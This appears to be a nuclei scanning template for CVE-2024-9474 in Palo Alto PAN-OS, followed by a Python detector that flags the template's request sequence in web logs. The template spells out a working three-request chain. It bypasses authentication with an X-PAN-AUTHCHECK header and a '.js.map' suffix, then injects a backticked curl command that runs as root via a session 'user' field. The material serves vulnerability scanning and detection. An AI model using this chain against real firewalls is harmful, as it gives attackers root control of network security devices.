id: CVE-2024-9474

info:
  name: PAN-OS Management Web Interface - Command Injection
  author: watchTowr,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
    Cloud NGFW and Prisma Access are not impacted by this vulnerability.
  impact: |
    An administrator with access to the management web interface can inject shell commands that run as root on the PAN-OS firewall, giving complete control of the device and bypassing every security control it enforces.
  remediation: |
    Apply the PAN-OS security updates published by Palo Alto Networks for this vulnerability. Until the update is installed, restrict access to the management web interface to trusted internal addresses.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2024-9474
    cwe-id: CWE-78
    epss-score: 0.94766
    epss-percentile: 0.99848
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: paloaltonetworks
    product: pan-os
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
    fofa-query: icon_hash="-631559155"
  tags: cve,cve2024,panos,rce,kev,vkev,vuln

# All three requests must succeed, in order, for the template to report a hit.
flow: http(1) && http(2) && http(3)

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"

http:
  # Step 1: fingerprint the management interface. No credentials are sent;
  # the X-PAN-AUTHCHECK header and the trailing ".js.map" path segment are
  # what let the request reach the PHP handler without a logged-in session.
  - raw:
      - |
        GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "0.0.0")'
          - 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")'
        condition: and
        internal: true

  # Step 2: create a session whose "user" value carries the injected command
  # (a curl to the interactsh callback host). The blank line between the
  # headers and the form body is required for the raw request to be valid.
  - raw:
      - |
        POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off
        Content-Type: application/x-www-form-urlencoded

        user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1

    matchers:
      - type: word
        part: body
        words:
          - "@start@PHPSESSID="
        internal: true

    extractors:
      - type: regex
        part: body
        name: phpsessid
        group: 1
        regex:
          - '@start@PHPSESSID=(.*?)@end@'
        internal: true

  # Step 3: use the new session; the injected command executes when the
  # firewall processes it, and the out-of-band DNS callback confirms it.
  - raw:
      - |
        GET /index.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{phpsessid}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "panos")'
        condition: and
# digest: 490a0046304402204f52c4db56d50d71ced144a3b795cd9ddce125a6594fe085bb79c7f602cbd115022054ad8c7d940c966a758670806cbc751e2938afedeece7102d4ba732514d2b17b:922c64590222798bb761d5b6d8e72950
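The three requests above leave a distinctive trail in web-server access logs: PHP handlers under /php/utils/ addressed through a trailing ".js.map" path segment, a POST to createRemoteAppwebSession.php, and a follow-up GET to /index.php/.js.map from the same source shortly afterwards. The detector below, an added example that is not part of the nuclei template or of ProjectDiscovery's code, looks for that sequence. The log lines are constructed for illustration in Apache/nginx "combined" format; the real PAN-OS management-plane log format is an assumption, so adapt LOG_RE to your source. The five-minute chaining window is also an arbitrary choice.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample lines in Apache/nginx "combined" log format. They are
# illustrative only; the real PAN-OS management-plane log format is an
# assumption not given on this page, so adapt LOG_RE to your source.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2024:10:01:02 +0000] "GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1" 200 83 "-" "curl/8.4.0"
10.0.0.5 - - [18/Nov/2024:10:01:03 +0000] "POST /php/utils/createRemoteAppwebSession.php/abcde.js.map HTTP/1.1" 200 120 "-" "curl/8.4.0"
10.0.0.5 - - [18/Nov/2024:10:01:04 +0000] "GET /index.php/.js.map HTTP/1.1" 200 5120 "-" "curl/8.4.0"
192.168.1.20 - - [18/Nov/2024:10:05:00 +0000] "GET /php/login.php HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
192.168.1.20 - - [18/Nov/2024:10:05:01 +0000] "GET /js/pan/base/pan.js.map HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# A .php handler addressed through extra path info ending in ".js.map":
# every request in the template above uses this suffix. A legitimate
# /something.js.map static asset does not match because ".php/" is required.
JSMAP_SUFFIX_RE = re.compile(r'\.php/[^?]*\.js\.map$', re.IGNORECASE)
SESSION_HANDLER = "/php/utils/createremoteappwebsession.php"
TRIGGER_PATH = "/index.php/.js.map"


def parse_line(line):
    """Return (src, timestamp, method, path, status) or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m.group("target")).path
    return (
        m.group("src"),
        datetime.strptime(m.group("ts"), TS_FMT),
        m.group("method"),
        path,
        int(m.group("status")),
    )


def classify(path):
    """Map a request path to the indicator it matches, or None."""
    lowered = path.lower()
    if lowered.startswith(SESSION_HANDLER) and JSMAP_SUFFIX_RE.search(path):
        return "session-create"   # the request carrying the injected `user` value
    if lowered == TRIGGER_PATH:
        return "trigger"          # the request that makes the firewall act on the session
    if JSMAP_SUFFIX_RE.search(path):
        return "jsmap-suffix"     # reconnaissance using the same suffix trick
    return None


def find_suspicious(lines, window=timedelta(minutes=5)):
    """Return {src: {"indicators": [...], "chained": bool}}.

    "chained" is True when a session-create request from the source was
    followed, within `window`, by a successful (HTTP 200) trigger request,
    i.e. the full sequence the template performs.
    """
    per_src = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, ts, _method, path, status = parsed
        label = classify(path)
        if label:
            per_src[src].append((ts, label, status))

    report = {}
    for src, events in per_src.items():
        events.sort()
        labels = [lbl for _, lbl, _ in events]
        chained = any(
            lbl == "session-create"
            and any(
                lbl2 == "trigger" and ts <= ts2 <= ts + window and st2 == 200
                for ts2, lbl2, st2 in events
            )
            for ts, lbl, _ in events
        )
        report[src] = {"indicators": labels, "chained": chained}
    return report


if __name__ == "__main__":
    for src, info in find_suspicious(SAMPLE_LOG.splitlines()).items():
        print(src, info)
```

Run against the sample, only 10.0.0.5 is reported, with all three indicators and chained set to True; the browser session from 192.168.1.20 that fetches a genuine .js.map asset produces nothing. A single "jsmap-suffix" hit is worth a look on its own, since the suffix has no legitimate reason to follow a .php handler, but the chained flag is what separates a scanner probe from an attempt that actually created a session and triggered it.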